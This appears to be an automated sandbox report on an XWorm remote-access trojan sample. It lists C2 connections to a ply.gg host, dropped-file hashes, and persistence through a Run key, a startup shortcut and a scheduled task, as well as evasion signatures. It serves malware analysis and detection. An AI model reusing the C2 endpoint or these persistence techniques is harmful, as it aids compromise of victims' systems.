US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 prod.balrog.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.166.253.131:443 location.services.mozilla.com tcp
US 8.8.8.8:53 locprod2-elb-us-west-2.prod.mozaws.net udp
US 8.8.8.8:53 locprod2-elb-us-west-2.prod.mozaws.net udp
US 8.8.8.8:53 131.253.166.35.in-addr.arpa udp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp

Files

memory/4924-0-0x00007FFFABA43000-0x00007FFFABA44000-memory.dmp

memory/4924-1-0x0000000000B80000-0x0000000000B96000-memory.dmp

memory/4924-5-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp

memory/4924-6-0x000000001B8D0000-0x000000001B8DC000-memory.dmp

memory/4924-7-0x00007FFFABA43000-0x00007FFFABA44000-memory.dmp

C:\Users\Admin\AppData\Roaming\9

MD5 d172c0a4ae3e8cef6a0a910bde62e195
SHA1 51139fc633fe81a66c8ed55081f92ec5256bd0bd
SHA256 94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7
SHA512 d82c930a42fd623aeee51007453d201e96110b546f1fb34080fc6d4c1488d71b3828f5f1833d347993444e4d332aa00fbb7b8922fce676d220375470ad0fa467

memory/212-10-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp

memory/4924-11-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp

memory/212-13-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\37ce38f0-4ce7-4910-b4f2-258a7d2ca6f5

MD5 f65f3923eca43d418a8d1d3e3f4fc213
SHA1 a1e92467a5041ff341a1d7045f4f3e159056cf67
SHA256 2cb0bbf485f30bcd7e8a7f2b06bbb6fdd03426c7983ef53299b22ee2dbd2963a
SHA512 e65354b32389bfb31508ebbafbfa985aeba5e9c0577088aeb37bdd021dd92bd94406ae1db9c4ed9f9684aa6f49578bf2e77750e62b79c254cba9430723d9337c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\7a5e7c69-872e-47ad-88c1-f65866979aaf

MD5 3ac961808a8161f92cff7d14c19cf836
SHA1 2e218f4a70716aa2276adad74ec81a65131dc907
SHA256 a15f0450b269c9394aaedec29e608f3032ddea029eedce559e83aa53e7500864
SHA512 e8d2c64c1c04f5b8ac28bca00f6449d0d21fa0a791351659edcf491f14c01c3ff07a23a33f2123a05c23c9a652a659fe2b5bc20a833fedc7f53c1045401b67e4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

MD5 57ac06e512c7eac07f0c6c7eb91d8491
SHA1 7fb5c99980e33efcf5673f5908638323c96db771
SHA256 42843d175ebb7de3c666d966d4fdcedb2815a69d2d7118e60882ed263ff95529
SHA512 4e08ce57525bfabae7e6dd3c263cab912a3babd1f1be1f79b7fb59a6c7ea6f5b4a08c7d1f9a823715c5dc1f80756522c86ecd8459a7e0d3ece7691937a2ef4b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

MD5 c4ed9a4b643e0fbe2a92daf92a21b37a
SHA1 9ff9d9d38f2212ac336ad854035ebb661449e599
SHA256 e76e58b566e18b91a0368fa0020c03887a08a3fd73ef09171ad1bed262fd9218
SHA512 9daa22b64467a896b014ce520ae1a7c37b1f7e3a75a1e4b64c5b198c005118208dfbc6792be4989628cd52d108ca7dce40b86b8ead6fcd5aea1564cd74de6a43

memory/4924-103-0x0000000001150000-0x000000000115C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 3e870a17eec8cda72b08515fb90f9853
SHA1 ce1fa73aafbd758a33b78ffb5ac3dbc86b75a536
SHA256 0d8b44141e78812aad99023a519f7bbffd300c71ac397e41a1187df9f45adeb5
SHA512 6fb097b5b5dbcb0dc38b184a73ff0d415e97cd53e4fb2f4e4d6663b511ce875b52bdbd5a49a7dd6e2d4f85ac3c77e157946d76f23a5a0f2f66d8e0029e845362

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649

MD5 aacd80a34dbfb37e0ed31a65ba87373b
SHA1 8241efc1164476df8e2c65e1a2343888c29fc35d
SHA256 50f9f1843a5f56d73416a3c6b7605aac4f6b4466fcc836ad1ece32dcf164e184
SHA512 3b42fcf28d0d6c5d7c0493e6e6d92459dc762bcb601985f991b6897392c2bd2747590a5f4dfb916d15db85f5533a1535868697d0d9c4763103e8735e02cdc225

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 e34477ea7275b02d40d2942c031591a0
SHA1 249b47356013cfc8a4610832d17757283cf24532
SHA256 76c90df72c93f9f87fa41a38d6416436d798060a03a182c0b71435d14ecec356
SHA512 fdc727106b1d6e24b3358e1879536e7d9eb390ad320f5d83b90178af0a863d565a7491bca2f4d6016a02a6c76c4bffbc77eadecc7cca338bed1f87364785b4b3

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

memory/4924-1311-0x00000000011B0000-0x00000000011BA000-memory.dmp

memory/4924-2090-0x00000000011C0000-0x00000000011CA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 d13942cb02edd287d6b3015b05ed9dba
SHA1 f56eff6bd7a0fe7bd1e969a873851b8f85736447
SHA256 72ac5fdd955df2d4f541869fd4cb0d888f388ec58cd95b24664d728f9aeda19a
SHA512 533bc191584cb27c04e882219a9c62f57dbc5ff7d02401f45be60497f7f51d59f30ce32f5b87ae8e29835f035f00ec3f5ed0e390be9282a8bf5bdb3052aa5377

memory/4924-2093-0x0000000001370000-0x0000000001382000-memory.dmp

memory/4924-2105-0x00000000011D0000-0x00000000011DA000-memory.dmp

memory/4924-2123-0x0000000001330000-0x000000000133C000-memory.dmp

memory/4924-2124-0x000000001E2C0000-0x000000001E7E6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 318e299884b2b38273e1b9b17745be92
SHA1 27732ce01d50d445fec4f61b26ad58cc27039caf
SHA256 110be5104b83817b7e4c23ec3837b9fd4a1dcfc7af7a6915f3cb514792c598a6
SHA512 4c841c8a477acaba8634f5185c258d41c4fd99e5b55da039207915efb621aa754bd6c3b9f976dc5dc998df9e3fb71d6ea58f7f53a8a26045d54333d0254b4f26

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\doomed\27442

MD5 00cfdf389ce68f598d4ca46a5abf3773
SHA1 041aefc1c4c32f28b8eb786227e9a445e7d5a82f
SHA256 7b07cc4a6b4737f0e52a33f6dbf123b719d6180944564f2bdba62e0770885bee
SHA512 2ce12fcaecd66c3808e8ae8123e10039b1af6b71d7daccbd1686cfdac15d2f7e626b65588b5e12eff7f3c8efef0fca4f0ba9aa78e5feb3babe3c3af774e622ed

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 77b7ddc07ed4e5e47284dfec55a8b810
SHA1 599245404e1d6b692e6fd20b76e252ef5ecb20cb
SHA256 a0b3bb5e56f20625f4f1eb07296efff35b901106dd81da346de8b5855489be58
SHA512 523eaebd0a4ed6034b2adb5a8dc0c8721bf8428e1f281f2c2ba69a0a9425c5d60a0e2d82a95ed6e650c5470ec6781bf412e50798db659c34fcc27d075dd9754c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\broadcast-listeners.json

MD5 1670a00283d35686e596627157aa6bd9
SHA1 c44d13c52d780a6c6bbe5f54ad2651a700264791
SHA256 575baef038cd227b653b17e4a396812b2f287de922f6443b967a668f6a80fafc
SHA512 e1c1ad457dc6406012218946e3fd2a776cc9ec403885ba679e44ad42dc7f2ef839ddb07e6078b2426493e551cf8ce792c4e69c1917fe57b85f81de0a50d46b12

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionCheckpoints.json

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\targeting.snapshot.json

MD5 88fdbfbd7340b77a4da1e54ac7716e47
SHA1 751c69300c76c666795a154b0bfbd5b81340bc65
SHA256 6c16de1b99b355f8ac621ea3d56fc582d5803481e31190ae96df3a82c8e542ea
SHA512 a6fdd3404cf21d65d6f09d3bbdf60653b1fe2e7c843492829d2217127d6a14def99bed3894605dfe2e06f80412cd88005cf134f5cdec2d7945acf8f72126d15c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\bookmarkbackups\bookmarks-2024-05-30_11_+ftwiIQfjYtrlniJNZ3V4g==.jsonlz4

MD5 5454384ec38638981ce5e67157b8f07d
SHA1 20da940d1b48d7c555b5f7d050fcc26b9fcaa217
SHA256 faa28431b2b70bce1f1552ef63266622ee731b9a30a3b314c9b6d6e0bdc07e11
SHA512 5526c70002b23f106dbb494742fce905cba27979f8bf8f2a92832232fb34b6bf873043f0b54f88567250f358e5fdd93438f5211318ee303ad71615ea85d1f2f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 05aa1c9ce9e3e90c300b06de2029bb63
SHA1 30e60219d27b7fc70c52bde50fed86e0237d156e
SHA256 3c05e111349b956c033bdeeba8d81b886e6883b2703067c22d0c0f2ce09b7c95
SHA512 af85e395ad164307d5ab100531c29eec930c4a77cc105839a3c0d3246f5340e38e116150aa92d30b8b0dee3f1807f4625e8f4c8b7805655f65ebf4002f63b297

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\SiteSecurityServiceState.txt

MD5 7aa4c37bcf97ee0332b5fe178cc5589c
SHA1 abbd30de394aaad91be807e2337735301d9e71c5
SHA256 4e65d75b32e1e2759d71c772a73dbe5f8d89ec730af9336e18566c172c873628
SHA512 f7627543609687dd5c164742f964907ed938fbd79ce03fc8a290c723062fd149340f8e7d7df4562f1f0202a2e5edae234f45af4e1e22636f2f548d38127c96f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\extensions.json.tmp

MD5 5a7aeb959001e385367a9e24baabd158
SHA1 f9af7cd87f397728c04eb3448cdedc44421946bd
SHA256 0242df1fc3f9d535b2a59caf141c25f2a1d91843b988933070e86682b2d15df2
SHA512 77ba2e0e56eba85fe0b8936424e68704d5b186386ae9f12b0f1f4f7a9c2beea308ff5178c402f28ac61013317214a5a67dc7ebb698e735578dc35423c71b401b

C:\Users\Admin\AppData\Local\Temp\stnqqf.exe

MD5 90d4d1e028d8be79482699f0a23eca1e
SHA1 1bb39ea5ddf177aab34a990ade5bd316b85f4dda
SHA256 03c10771abb8cd2ad13402826d8f69dee1f2637063d75613ece28ac557a842c4
SHA512 f710d67ad1beb2f9fb4e5a61d8e2fba2b28c0f7a390ee907e1c47f9396501e60062ef66459dd6ec2962e517c642f29c323c08522e477afb7f616b062bfd31617

memory/12012-4268-0x00007FF724980000-0x00007FF7249AE000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\doomed\17348

MD5 ccf67232fe8301c1b547ad50715a8d5b
SHA1 b579df2bff656175248f6ec11d950f275ba0880b
SHA256 66ece82ff63f121fa6aba232f7b05d669318db628c6278567f1ae0743ef83a55
SHA512 61be8d14eaff322bd2ed7e9f986d4146ff52551c337e84e4493c6efb13f3e136ae967dee5d22e13ac9f118e9f619275fa3032293bfa3a2764d637d56d41f7ca2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 fa7455b4c7db8035ea833e220e342615
SHA1 1d376c14baa2824c87738be5eaf210aef51ac2d3
SHA256 3ad9a7caa46fbfbcdfb3a37d6cd6ad8201c7ae6ae8aa7d48603fd27ad3cf0400
SHA512 b4bd90f5d3cf05eaaebd1b40c44c81e2e5f57795c71fdd15fc173500da6b326daafbd67e35bf8a073ff9828c7ded32ce9e2359d34b0e567215149a65438c97cf

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 20:07

Reported

2024-05-30 20:40

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1566s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\9 = "C:\\Users\\Admin\\AppData\\Roaming\\9" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 916 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1972 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1972 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1972 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
